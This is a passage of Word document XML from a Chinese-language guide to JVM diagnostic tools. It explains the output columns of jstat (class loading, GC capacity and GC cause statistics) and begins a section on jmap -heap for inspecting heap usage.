          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00633228" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>输出内容含义如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4"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742"/>
        <w:gridCol w:w="927"/>
        <w:gridCol w:w="897"/>
        <w:gridCol w:w="1027"/>
        <w:gridCol w:w="592"/>
      </w:tblGrid>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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Loaded</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Bytes</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Unloaded</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Bytes</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Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49955</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49701.5   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49955</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49701.5   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49955</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49701.5   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49955</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49701.5   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49963</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49708.8   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49963</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49708.8   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49963</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49708.8   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49971</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49716.1   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49971</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49716.1   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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49971</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49716.1   </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35528</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32456.1     </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34.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00634851" w:rsidRPr="00633228" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>jstat -gc 2083 2000 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（每隔</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>秒监控一次，共做</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>输出内容含义如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4"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642"/>
        <w:gridCol w:w="4213"/>
      </w:tblGrid>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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S0C</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Current survivor</w:t>
            </w:r>
            <w:r w:rsidRPr="00633228">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>（存活的）</w:t>
            </w:r>
            <w:r w:rsidRPr="00633228">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> space 0 capacity (KB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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EC</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Current eden space capacity (KB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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EU</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Eden space utilization (KB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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OC</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Current old space capacity (KB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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OU</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Old space utilization (KB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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PC</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Current permanent space capacity (KB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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PU</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Permanent space utilization (KB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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YGC</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Number of young generation GC Events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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YGCT</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Young generation garbage collection time.(</w:t>
            </w:r>
            <w:r w:rsidRPr="00633228">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>单位秒</w:t>
            </w:r>
            <w:r w:rsidRPr="00633228">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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FGC</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Number of full GC events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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FGCT</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Full garbage collection time.(</w:t>
            </w:r>
            <w:r w:rsidRPr="00633228">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>单位秒</w:t>
            </w:r>
            <w:r w:rsidRPr="00633228">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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GCT</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Total garbage collection time.(</w:t>
            </w:r>
            <w:r w:rsidRPr="00633228">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>单位秒</w:t>
            </w:r>
            <w:r w:rsidRPr="00633228">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00634851" w:rsidRPr="00633228" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>监控内存使用情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（查看内存溢出相对有用）</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>jstat -gccause 2083 5000 </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（每隔</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>秒监控一次）</w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00633228">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>输出内容含义如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4"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642"/>
        <w:gridCol w:w="6219"/>
      </w:tblGrid>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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S0</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Survivor space 0 utilization as a percentage of the space's current capacity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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S1</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Survivor space 1 utilization as a percentage of the space's current capacity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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E</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Eden space utilization as a percentage of the space's current capacity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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O</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Old space utilization as a percentage of the space's current capacity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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P</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Permanent space utilization as a percentage of the space's current capacity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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YGC</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Number of young generation GC events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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YGCT</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Young generation garbage collection time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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FGC</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Number of full GC events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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FGCT</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Full garbage collection time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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GCT</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Total garbage collection time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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LGCC</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Cause of last Garbage Collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634851" w:rsidRPr="00633228" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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GCC</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Cause of current Garbage Collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00634851" w:rsidRPr="00456B0D" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00815354" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">jmap </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>heap pid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>jmap -heap pid</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>查看进程堆内存使用情况，包括使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>算法、堆配置参数和各代中堆内存使用情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="00634851" w:rsidP="003C033B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4602079" cy="4272077"/>
            <wp:effectExtent l="19050" t="0" r="8021" b="0"/>
            <wp:docPr id="252" name="图片 1" descr="D:\用户目录\Documents\Tencent Files\57548991\Image\C2C\{_MR16V7$K2N0S86KD@0({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用户目录\Documents\Tencent Files\57548991\Image\C2C\{_MR16V7$K2N0S86KD@0({F.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
